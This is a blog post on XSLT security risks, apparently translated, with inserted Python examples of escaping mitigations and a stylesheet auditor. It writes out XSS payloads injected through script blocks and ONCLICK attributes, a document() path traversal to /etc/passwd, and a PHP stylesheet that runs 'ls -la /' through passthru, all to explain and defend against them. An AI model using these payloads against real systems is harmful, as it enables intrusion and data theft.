Surging clouds
I've been going back and forth with suddy on XSLT security questions lately; he wrote a good blog post about them: http://bbs.2cto.com/read.php?tid=60523
Today I want to add a few bits of my own. Limited energy, so only a rough write-up.
XSLT 2.0 is more powerful, but browsers do not fully support it.
XSLT processors are implemented in Java and in PHP.
Client browsers also implement an XSLT processor, which can be called from JS.
The transform step takes the XML data, assembles it according to the XSL stylesheet into an HTML document, and finally displays that in the browser. For details, refer to the W3C standards on XHTML and XSLT.
On the client side, you can refer to the following JS:
<script>
function loadXMLDoc(fname)
{
  var xmlDoc;
  // code for IE
  if (window.ActiveXObject)
  {
    xmlDoc = new ActiveXObject("Microsoft.XMLDOM");
  }
  // code for Mozilla, Firefox, Opera, etc.
  else if (document.implementation && document.implementation.createDocument)
  {
    xmlDoc = document.implementation.createDocument("", "", null);
  }
  else
  {
    alert("Your browser cannot handle this script");
  }
  xmlDoc.async = false;
  xmlDoc.load(fname);
  return xmlDoc;
}

function displayResult()
{
  var xml = loadXMLDoc("test.xml");
  var xsl = loadXMLDoc("test.xsl");
  // code for IE
  if (window.ActiveXObject)
  {
    var ex = xml.transformNode(xsl);
    document.getElementById("example").innerHTML = ex;
  }
  // code for Mozilla, Firefox, Opera, etc.
  else if (document.implementation && document.implementation.createDocument)
  {
    var xsltProcessor = new XSLTProcessor();
    xsltProcessor.importStylesheet(xsl);
    var resultDocument = xsltProcessor.transformToFragment(xml, document);
    document.getElementById("example").appendChild(resultDocument);
  }
}
</script>
In this process, if the output goes into ordinary HTML content, the transform itself causes no problem: even if the data contains special markup such as <script>, it is treated as text in the HTML. (Even if the data is HTML-encoded before the transform, the transform restores it, so HTML-encoding before the transform is useless; there are, however, some tricks for outputting HTML-encoded data.)
That is, if the value of a node in the XML file is <script>alert(1);</script>, it cannot be executed in the assembled HTML.
As shown in Firebug below:
However, if this value is output inside a script element or in an element's event attribute, the script may be executed.
For example, in the xsl file:
<?xml version="1.0" encoding="ISO-8859-1"?>
<xsl:stylesheet version="1.0"
  xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
<xsl:template match="/">
  <html>
  <body>
    <h2>My CD Collection</h2>
    <table border="1">
      <tr bgcolor="#9acd32">
        <th align="left">Title</th>
        <th align="left">Artist</th>
      </tr>
      <xsl:for-each select="catalog/cd">
      <tr>
        <td><xsl:value-of select="title"/></td>
        <td><xsl:value-of select="artist"/></td>
        <script type="text/javascript">
          var x = <xsl:value-of select="artist"/>;
          alert(x);
        </script>
        <input type="text">
          <xsl:attribute name="ONCLICK"><xsl:value-of select="artist"/></xsl:attribute>
        </input>
      </tr>
      </xsl:for-each>
    </table>
  </body>
  </html>
</xsl:template>
</xsl:stylesheet>
In the xml file:
<?xml version="1.0" encoding="ISO-8859-1"?>
<catalog>
  <cd>
    <title><![CDATA[</script><script>alert(/xss1/);</script>]]></title>
    <artist>alert(1);</artist>
    <country>USA</country>
    <company>Columbia</company>
    <price>10.90</price>
    <year>1985</year>
  </cd>
</catalog>
Then the onclick event executes alert(1).
Similarly, once the XML data is modified appropriately, the data output inside the script tag is executed too.
For how to solve this problem, refer to my previous blog posts.
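The point of the walk-through above is that the same XML value is harmless in ordinary element content but becomes code inside a script element or an event attribute. The following added example (my own illustration, not code from the post) parses the post's catalog XML with the Python standard library, reproduces what each output context does with the value, and shows the two mitigations a stylesheet author would use instead: a JSON string literal with angle brackets written as \u escapes for the script case, and a data-* attribute instead of an on* attribute for the event case. The function names and the trimmed catalog are constructed for this example.

```python
import html
import json
import xml.etree.ElementTree as ET

# Constructed copy of the post's catalog XML (trimmed to the two fields used).
# The parser decodes the CDATA section, so the title's string value is raw markup.
CATALOG_XML = """<catalog>
  <cd>
    <title><![CDATA[</script><script>alert(/xss1/);</script>]]></title>
    <artist>alert(1);</artist>
  </cd>
</catalog>"""


def value_of(xml_text, path):
    """The string value xsl:value-of takes from the first node matching path."""
    return ET.fromstring(xml_text).findtext(path) or ""


def emit_html_text(value):
    """Element content: the HTML output method escapes text nodes, so markup
    in the data is rendered as literal text and nothing executes."""
    return "<td>" + html.escape(value, quote=False) + "</td>"


def emit_in_script(value):
    """Inside <script>, XSLT's HTML output method does not escape text, so the
    data is spliced into JavaScript source exactly as the post's template does."""
    return "<script>var x = " + value + ";</script>"


def emit_in_event_attr(value):
    """xsl:attribute name="onclick": the data becomes the handler body."""
    return '<input type="text" onclick="' + html.escape(value, quote=True) + '">'


def emit_in_script_safely(value):
    """Mitigation for the script case: emit the data as a JSON string literal
    with < > & written as \\u escapes, so a '</script>' inside the data can
    never close the script block and the value only ever reaches JS as a string."""
    literal = (json.dumps(value)
               .replace("<", "\\u003c")
               .replace(">", "\\u003e")
               .replace("&", "\\u0026"))
    return "<script>var x = " + literal + ";</script>"


def emit_in_data_attr(value):
    """Mitigation for the event case: never put data into an on* attribute;
    carry it in a data-* attribute (attribute-escaped) and read it from JS."""
    return '<input type="text" data-artist="' + html.escape(value, quote=True) + '">'


def breaks_out_of_script(rendered):
    """True when the rendered script block contains a premature </script>."""
    body = rendered[len("<script>"):-len("</script>")]
    return "</script" in body.lower()


if __name__ == "__main__":
    title = value_of(CATALOG_XML, "cd/title")
    artist = value_of(CATALOG_XML, "cd/artist")
    print(emit_html_text(title))          # markup shown as text
    print(emit_in_script(title))          # breaks out of the script block
    print(emit_in_event_attr(artist))     # handler body is attacker data
    print(emit_in_script_safely(title))   # stays a string
    print(emit_in_data_attr(artist))
```

The two `emit_*_safely`-style helpers correspond to what you would write into the stylesheet: never place `xsl:value-of` output bare inside `<script>` or inside an `on*` attribute, only into text content, a JSON-encoded literal, or a non-event attribute.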
In addition, the xsl file itself brings some security problems.
First, the XSL file may cause XSS: if you are allowed to upload an XSL file directly, you can write a script straight into it and have it executed.
XSL supports script extensions, that is, a script tag.
Second, some XSLT processors can also load local files through document() or similar functions such as doc(). If this is poorly controlled, it may allow loading something like ../../../../../../../../../etc/passwd.
In addition, some server-side functions can sometimes be executed from XSLT, for example (this is specific to the PHP XSLT processor):
<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:php="http://php.net/xsl">
  <xsl:template match="/">
    <xsl:value-of select="php:function('passthru', 'ls -la /')"/>
  </xsl:template>
</xsl:stylesheet>
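If uploaded stylesheets are accepted at all, the processor-side settings above (disabling script extensions and document() loading, not registering PHP functions) are the real control; a screening pass over the XSL before it reaches the processor is a useful second line and makes the risky constructs concrete. The following added example (my own illustration, not code from the post or from any XSLT processor) audits a stylesheet with the Python standard library for the three problems discussed here: code-execution extension namespaces, document()/doc()-style loads, and php:function() calls. The PHP namespace URI is the one the PHP XSL extension registers; the MSXML and Xalan URIs are those processors' well-known extension namespaces. Severity labels, function names and the sample stylesheets are constructed for this example.

```python
import io
import re
import xml.etree.ElementTree as ET

XSL_NS = "http://www.w3.org/1999/XSL/Transform"

# Extension namespaces that let a stylesheet run code. The PHP one is the
# namespace used in the post's example; the other two are the well-known
# MSXML and Xalan extension namespaces.
RISKY_NAMESPACES = {
    "http://php.net/xsl": "php:function() callbacks (PHP XSLTProcessor)",
    "urn:schemas-microsoft-com:xslt": "msxsl:script (MSXML script extension)",
    "http://xml.apache.org/xalan": "Xalan extension elements and functions",
}

# XPath calls that make the processor read other files or URLs.
DOC_FUNC_RE = re.compile(r"\b(document|doc|unparsed-text)\s*\(")
PHP_FUNC_RE = re.compile(r"\bphp:function\s*\(")


def audit_stylesheet(xsl_text):
    """Return (severity, message) findings for an untrusted stylesheet."""
    findings = []
    # Namespace declarations are consumed by the parser, so collect them
    # from start-ns events rather than from element attributes.
    source = io.BytesIO(xsl_text.encode("utf-8"))
    for _event, (prefix, uri) in ET.iterparse(source, events=("start-ns",)):
        if uri in RISKY_NAMESPACES:
            findings.append(("high", "declares xmlns:%s=%r: %s"
                             % (prefix, uri, RISKY_NAMESPACES[uri])))
    root = ET.fromstring(xsl_text)
    for el in root.iter():
        ns, _, local = el.tag.rpartition("}")
        ns = ns.lstrip("{")
        if local == "script" and ns == "":
            # A literal HTML <script> in the output: XSS if the XSL is untrusted.
            findings.append(("high", "literal <script> element in template output"))
        elif local == "script" and ns != XSL_NS:
            findings.append(("high", "script extension element in namespace %r" % ns))
        if ns == XSL_NS and local in ("include", "import"):
            findings.append(("medium", "xsl:%s pulls in external stylesheet %r"
                             % (local, el.get("href"))))
        for attr, value in el.attrib.items():
            if DOC_FUNC_RE.search(value):
                findings.append(("high", "%s=%r reads an external document" % (attr, value)))
            if PHP_FUNC_RE.search(value):
                findings.append(("critical", "%s=%r calls a PHP function" % (attr, value)))
    return findings


def is_acceptable(xsl_text):
    """Policy used here: reject anything rated high or critical."""
    return not any(sev in ("high", "critical") for sev, _ in audit_stylesheet(xsl_text))


# Constructed samples: the post's PHP stylesheet, a document() loader using the
# path the post mentions, and a harmless table-only stylesheet.
PHP_XSL = """<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
  xmlns:php="http://php.net/xsl">
  <xsl:template match="/">
    <xsl:value-of select="php:function('passthru', 'ls -la /')"/>
  </xsl:template>
</xsl:stylesheet>"""

DOC_XSL = """<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
  <xsl:template match="/">
    <xsl:copy-of select="document('../../../../../../../../../etc/passwd')"/>
  </xsl:template>
</xsl:stylesheet>"""

CLEAN_XSL = """<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
  <xsl:template match="/">
    <table border="1">
      <xsl:for-each select="catalog/cd">
        <tr><td><xsl:value-of select="title"/></td></tr>
      </xsl:for-each>
    </table>
  </xsl:template>
</xsl:stylesheet>"""


if __name__ == "__main__":
    for name, xsl in (("php", PHP_XSL), ("document", DOC_XSL), ("clean", CLEAN_XSL)):
        print(name, "acceptable" if is_acceptable(xsl) else "rejected")
        for sev, msg in audit_stylesheet(xsl):
            print("  [%s] %s" % (sev, msg))
```

The audit is deliberately allow-list shaped: anything that names an extension namespace, reads another document, or calls out to PHP is rejected outright, and an `xsl:include`/`xsl:import` is flagged so the referenced file can be reviewed with the same rules.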
Microsoft once declared IE safe in this respect, because the script extension has been disabled in MSXML for a long time: a block like
<script>
......
</script>
in the XSL is not parsed by IE, and enabling it requires additional configuration options.
The document() function is also disabled in MSXML.
These options do increase IE's security, but I found that IE does not handle output placed into an event attribute.
That is to say, a statement like
<input type="text">
<xsl:attribute name="ONCLICK"><xsl:value-of select="artist"/></xsl:attribute>
</input>
will still cause XSS.
References:
http://www.tkachenko.com/blog/archives/000726.html
http://www.acunetix.com/blog/web-security-articles/the-hidden-dangers-of-xsltprocessor-remote-xsl-injection/